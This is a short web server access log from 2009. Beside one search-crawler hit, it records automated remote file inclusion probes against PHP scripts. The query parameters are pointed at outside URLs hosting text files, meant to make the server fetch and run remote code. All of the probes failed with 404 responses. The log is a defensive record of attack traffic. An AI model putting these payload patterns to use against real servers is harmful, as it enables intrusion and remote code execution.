123.125.66.65 - - [13/Nov/2009:04:24:15 -0500] "GET / HTTP/1.1" 200 409 "-" "Baiduspider+(+http://www.baidu.com/search/spider.htm)"
85.25.94.14 - - [13/Nov/2009:04:24:18 -0500] "GET /logs/access_log.Q109063000//myfunctions/mygallerybrowser.php?myPath=http://videochatbuilder.com/id3.txt?? HTTP/1.1" 404 258 "-" "libwww-perl/5.803"
85.25.94.14 - - [13/Nov/2009:04:24:18 -0500] "GET /logs//myfunctions/mygallerybrowser.php?myPath=http://videochatbuilder.com/id3.txt?? HTTP/1.1" 404 236 "-" "libwww-perl/5.803"
85.25.94.14 - - [13/Nov/2009:04:24:18 -0500] "GET //myfunctions/mygallerybrowser.php?myPath=http://videochatbuilder.com/id3.txt?? HTTP/1.1" 404 231 "-" "libwww-perl/5.803"
85.25.94.14 - - [13/Nov/2009:04:24:20 -0500] "GET /logs/access_log.Q109052000//myfunctions/mygallerybrowser.php?myPath=http://videochatbuilder.com/id3.txt?? HTTP/1.1" 404 258 "-" "libwww-perl/5.803"
222.236.221.38 - - [13/Nov/2009:04:27:03 -0500] "GET //excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://www.angelcitytrading.com/css/1.txt?? HTTP/1.1" 404 232 "-" "Mozilla/5.0"
222.236.221.38 - - [13/Nov/2009:04:27:03 -0500] "GET /logs/access_log.Q109100200%20%20//excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://www.angelcitytrading.com/css/1.txt?? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
